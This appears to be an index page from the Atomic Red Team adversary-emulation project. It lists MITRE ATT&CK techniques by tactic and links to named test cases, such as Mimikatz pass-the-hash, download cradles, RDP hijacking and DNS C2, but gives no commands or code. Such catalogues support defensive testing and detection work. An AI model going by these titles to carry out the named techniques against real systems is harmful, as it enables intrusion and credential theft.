- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.002 Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
- Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
- Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #8: List macOS Firewall Rules [macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# reconnaissance
- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1609 Container Administration Command](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [linux, macos]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- [T1610 Deploy Container](../../T1610/T1610.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1204.002 Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1563.002 RDP Hijacking](../../T1563.002/T1563.002.md)
- Atomic Test #1: RDP hijacking [windows]
- [T1021.001 Remote Desktop Protocol](../../T1021.001/T1021.001.md)
- Atomic Test #1: RDP to DomainController [windows]
- Atomic Test #2: RDP to Server [windows]
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.002 SMB/Windows Admin Shares](../../T1021.002/T1021.002.md)
- Atomic Test #1: Map admin share [windows]
- Atomic Test #2: Map Admin Share PowerShell [windows]
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
